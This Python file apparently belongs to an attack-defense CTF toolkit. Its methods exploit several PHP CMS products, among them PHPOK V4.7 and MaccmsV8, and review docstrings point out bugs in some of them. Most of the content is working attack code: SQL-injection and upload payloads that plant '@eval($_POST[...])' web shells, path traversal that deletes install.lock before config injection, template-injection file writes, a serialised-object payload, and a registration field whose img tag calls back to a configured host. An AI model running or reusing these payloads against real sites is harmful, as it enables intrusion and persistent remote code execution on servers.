def attack(self):
    """Submit a member registration whose ``info[content]`` embeds an ``<img>`` tag
    pointing back at the address taken from ``config.ccServer``.

    Success is decided only on the response text (HTTP 200, "MySQL Error" and
    "http" present). Returns ``(successUrl, Utils.getPassword(self.host))``;
    otherwise raises PayloadFailException.

    The trailing bare ``except`` rewraps *every* exception raised inside the
    ``try`` (network errors and programming errors alike) as
    ``PayloadFailException('Payload failed for ...')``, so failures are not
    distinguishable by the caller.
    """
    url = "http://%s/index.php?m=member&c=index&a=register&siteid=1" % self.host
    print(url)
    login_pass = Utils.randmd5()
    # address/port come from config.ccServer; this value is only used inside the img src
    callback_shell_url = "http://%s:%d/" % (config.ccServer['address'], config.ccServer['port'])
    data = {
        "modelid": 10,
        "username": Utils.randmd5(),
        "password": login_pass,
        "pwdconfirm": login_pass,
        "email": Utils.randmd5() + "@qq.com",
        "nickname": "nick" + Utils.randmd5()[0:8],
        "info[content]": '<img src="%s?.php#.jpg" />' % callback_shell_url,
        "dosubmit": "1",
        "protocol": ""
    }
    print(data)
    try:
        # `post` is an unqualified name; presumably requests.post — not visible here
        resp = post(url=url, data=data)
        print(resp.text)
        if 200 == resp.status_code and "MySQL Error" in resp.text and "http" in resp.text:
            # NOTE(review): the slice expression below is malformed
            # (`resp.text, index(".php")` inside the subscript), so this branch
            # raises and the bare except turns it into PayloadFailException.
            successUrl = resp.text[resp.text.index("http"):resp.text, index(".php")] + ".php"
            return successUrl, Utils.getPassword(self.host)
        else:
            raise PayloadFailException('Payload no echo message for %s' % self.host)
    except:
        raise PayloadFailException('Payload failed for %s' % self.host)
def attack(self):
    """PHPOK V4.7 upload payload (product/version per the failure message).

    Two multipart POSTs to ``index.php?c=upload``: ``f=save`` with a crafted
    ``upfile`` filename, then ``f=replace&oldid=<id+1>`` with ``horse.simple``
    (``id`` is parsed out of the first response's JSON-ish text). Finally GETs
    ``shellpath`` and returns ``(shell, horse.password)`` on HTTP 200; any other
    status raises PayloadFailException.

    There is no try/except in this function: connection errors, a failed
    ``re.search`` (``None.group`` → AttributeError) and a non-integer ``id``
    all propagate to the caller unchanged.
    """
    shellpath = 'res/.s.php'
    phpsession = ''  # sent as the PHPSESSION cookie; always empty here
    url = 'http://{}/index.php?c=upload&f=save'.format(self.host)
    files = [
        ('upfile', (
            # filename field: hex-encoded `shellpath` is spliced in as one 0x... literal
            "1','r7ip15ijku7jeu1s1qqnvo9gj0','30',''),('1',0x7265732f3230313730352f32332f,0x393936396465336566326137643432352e6a7067,'',0x"
            + binascii.b2a_hex(shellpath.encode()).decode()
            + ",'1495536080','2.jpg",
            '<?php @eval($_POST[cmd]);?>',
            'image/jpg')),
    ]
    horse = Horse(self.host)
    files1 = {'upfile': ('1.jpg', horse.simple, 'image/jpg')}
    cookies = {'PHPSESSION': phpsession}
    r = req.post(url, files=files, cookies=cookies)
    response = r.text
    # `id` shadows the builtin; the pattern is a non-raw string containing `\d`
    # (a SyntaxWarning on recent Pythons, but kept verbatim here).
    id = re.search('"id":"(\d+)"', response, re.S).group(1)
    id = int(id) + 1
    url = 'http://{}/index.php?c=upload&f=replace&oldid={}'.format(
        self.host, id)
    # response of the replace request is not inspected
    r = req.post(url, files=files1, cookies=cookies)
    shell = 'http://{}/{}'.format(self.host, shellpath)
    response = req.get(shell)
    if response.status_code == 200:
        return shell, horse.password
    raise PayloadFailException('PHPOK V4.7 payload fail')
def attack(self):
    """Three-step admin-side payload: log in, delete ``config/install.lock`` via a
    path-traversal parameter, then re-run the installer with a crafted
    ``db_name``; finally POSTs ``c=echo seven;`` to ``config/config_db.php`` and
    treats "seven" in a 200 response as success.

    Intended return is ``(shell, 'c')``, but ``shell`` is never assigned in
    this function, so the success branch raises NameError, which the
    ``except Exception`` below rewraps as ``PayloadFailException(str(e))``.
    Every other error is rewrapped the same way.
    """
    try:
        # login — credentials are hard-coded literals (`'******'` is the literal value sent)
        s = requests.Session()
        s.get('http://{0}/admin/login.php'.format(self.host))
        url = 'http://{0}/admin/index.php?lang=cn&anyid=&n=login&c=login&a=dologin&langset='.format(
            self.host)
        s.post(url, data={
            'action': 'login',
            'login_name': 'admin',
            'login_pass': '******',
            'Submit': ''
        }, timeout=2, allow_redirects=False)
        # delete — response is not checked
        deleteUrl = 'http://{}/admin/app/batch/csvup.php?fileField=test-1&flienamecsv=../../../config/install.lock'.format(
            self.host)
        s.get(deleteUrl, timeout=2)
        # reinstall
        reinstallUrl = 'http://{}/install/index.php?action=db_setup'.format(
            self.host)
        res = s.post(reinstallUrl, data={
            'setup': 1,
            'db_type': 'mysql',
            'db_prefix': 'met_',
            'db_host': 'localhost',
            'db_name': 'met#*/@eval($_POST[c]);/*',
            'cndata': 'yes',
            'endata': 'yes',
            'showdata': 'yes'
        }, timeout=2, allow_redirects=False)
        print(res.text)
        # shell check — plain requests.post, not the logged-in session
        shellUrl = 'http://{}/config/config_db.php'.format(self.host)
        res = requests.post(shellUrl, data={'c': 'echo seven;'}, timeout=2)
        if res.status_code == 200 and 'seven' in res.text:
            # NOTE(review): `shell` is undefined here (see docstring)
            return shell, 'c'
        else:
            raise PayloadFailException('Shell Upload Fail')
    except Exception as e:
        raise PayloadFailException(str(e))
def attack(self):
    """POST a shell-redirect string in form field ``1`` to ``detail/7.html``,
    then GET ``uploads/s.php``.

    Returns ``(url2, 'c')`` when the GET answers HTTP 200 (the POST's response
    is assigned to ``res`` but never inspected); otherwise raises
    PayloadFailException. ``except Exception`` rewraps any error, including
    timeouts, as ``PayloadFailException(str(e))``.
    """
    try:
        url = 'http://{0}/detail/7.html'.format(self.host)
        # first response is overwritten below without being checked
        res = requests.post(
            url,
            data={
                '1': "echo '<?php @eval($_POST[c]);?>' >> ./uploads/s.php"
            },
            timeout=2)
        url2 = 'http://{0}/uploads/s.php'.format(self.host)
        res = requests.get(url2, timeout=2)
        if res.status_code == 200:
            return url2, 'c'
        else:
            raise PayloadFailException('simple horse write fail')
    except Exception as e:
        raise PayloadFailException(str(e))
def execute(self):
    """POST a fixed base64 ``seridata`` blob to ``home/Api/unserializehook.html``
    and treat the whole response body as the flag.

    Returns ``[flag, msg]`` where ``msg`` is whatever ``sendFlag(flag)`` returns.
    Only an empty body is rejected (``if not flag``); any non-empty 200 response
    — including an error page — is forwarded to ``sendFlag``. All exceptions are
    rewrapped as ``PayloadFailException(str(e))``.
    """
    try:
        url = 'http://{0}/home/Api/unserializehook.html'.format(self.host)
        # the payload is a hard-coded, pre-encoded string; nothing host-specific is substituted
        res = requests.post(
            url,
            data={
                'seridata': "TzoxMDoibXlsaWJcRmlsZSI6Mjp7czo4OiJmaWxlbmFtZSI7czoyNzoiaHR0cDovLzE5Mi4xNjguMTAwLjEvR2V0a2V5IjtzOjc6ImNvbnRlbnQiO047fQ=="
            },
            timeout=2)
        if res.status_code == 200:
            flag = res.text
            if not flag:
                raise PayloadFailException('GET FLAG FAIL')
            msg = sendFlag(flag)
            return [flag, msg]
        else:
            # message is copied from the upload payloads; it does not describe this path
            raise PayloadFailException('simple horse write fail')
    except Exception as e:
        raise PayloadFailException(str(e))
def attack(self):
    """Multipart POST to ``admin/index.php?c=uploadify&m=include&a=doupfile`` with
    ``html_filename=configs.php``, then GET ``/configs.php``.

    Returns ``(url2, 'c')`` when the GET answers HTTP 200; otherwise raises
    PayloadFailException. The upload response is discarded, so a rejected
    upload is only detected indirectly via the follow-up GET. All exceptions
    are rewrapped as ``PayloadFailException(str(e))``.
    """
    try:
        metinfonow = 'zitkifx'  # fixed value passed in the query string
        path = 'configs.php'
        url = 'http://{0}/admin/index.php?c=uploadify&m=include&a=doupfile&lang=cn&metinfonow={1}&html_filename={2}'.format(
            self.host, metinfonow, path)
        # file tuple is (filename, content, content-type); return value not used
        requests.post(url, files={
            'test': ('<?php @eval($_POST[c]);?>', 'test', 'image/png')
        }, timeout=2)
        url2 = 'http://{0}/{1}'.format(self.host, path)
        res = requests.get(url2, timeout=2)
        if res.status_code == 200:
            return url2, 'c'
        else:
            raise PayloadFailException('simple horse write fail')
    except Exception as e:
        raise PayloadFailException(str(e))
def execute(self):
    """Fetch ``member/api/imgget`` with a stored member session and extract a
    base64 value from the response HTML.

    Requires ``sessions[self.host]`` (a module-level mapping, not visible here)
    and sends it as the ``PHPSESSID`` cookie. The ``ebimgname`` parameter is a
    fixed URL. Returns ``[flag, msg]`` with ``msg`` from ``sendFlag``; raises
    PayloadFailException when no session is stored, the regex does not match,
    or ``Utils.base64_d`` yields a falsy value. All exceptions are rewrapped as
    ``PayloadFailException(str(e))``.
    """
    try:
        if self.host not in sessions:
            raise PayloadFailException('has not member session')
        session = sessions[self.host]
        url = 'http://{0}/member/api/imgget'.format(self.host)
        # Cookie is passed as a raw header rather than via `cookies=`
        res = requests.get(url,params={
            'ebimgname':"http://192.168.100.1/Getkey"
        },timeout=2,headers={
            'Cookie':'PHPSESSID='+session
        })
        # matches the first <div ... bold;margin: 15px 0;">…</div> in the page
        find = re.search(r'bold;margin: 15px 0;">(.*?)</div>',res.text)
        if find:
            flag = Utils.base64_d(find.group(1))
            if not flag:
                raise PayloadFailException('flag base64decode fail '+find.group(1))
            msg = sendFlag(flag)
            return [flag,msg]
        else:
            raise PayloadFailException('flag not found')
    except Exception as e:
        raise PayloadFailException(str(e))
def attack(self):
    """MaccmsV8 payload (product/version per its messages): first POSTs a
    template-expression probe to ``index.php?m=vod-search`` and requires
    ``Utils.md5('a')`` in a 200 response, then POSTs a second expression and
    GETs ``shellPath``.

    Returns ``(shellUrl, 'am')`` only when the final GET answers HTTP 200.
    Note the missing ``else``: any other status falls off the end and the
    function returns ``None`` without raising. ``PayloadFailException`` is
    re-raised as-is; every other exception is replaced by a bare
    ``PayloadFailException`` class (raised uninstantiated, no message).
    """
    try:
        url = 'http://{0}/index.php?m=vod-search'.format(self.host)
        print(url)
        # probe: the response must echo md5('a') for the target to be considered affected
        res = requests.post(url, data={'wd': '{if-A:print(md5(a))}{endif-A}'}, timeout=2)
        if not res.status_code == 200 or Utils.md5('a') not in res.text:
            raise PayloadFailException('MaccmsV8 not satisfied')
        print('MaccmsV8 success')
        shellPath = '/upload/awd3.php'
        # configuration.webRoot is a module-level setting not visible in this file
        shellLocation = configuration.webRoot + shellPath
        shellLocation = Utils.base64(shellLocation).strip('=').strip('+')
        payload = 'wd={if-A:print(fputs(fopen(base64_decode(' + shellLocation + '),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2FtXSk7Pz4x)))}{endif-A}'
        print(payload)
        # response to the write request is not checked
        res = requests.post(url, data={'wd': payload}, timeout=2)
        shellUrl = 'http://' + self.host + shellPath
        res = requests.get(shellUrl)  # no timeout here, unlike the POSTs above
        if res.status_code == 200:
            return shellUrl, 'am'
    except PayloadFailException:
        raise
    except:
        raise PayloadFailException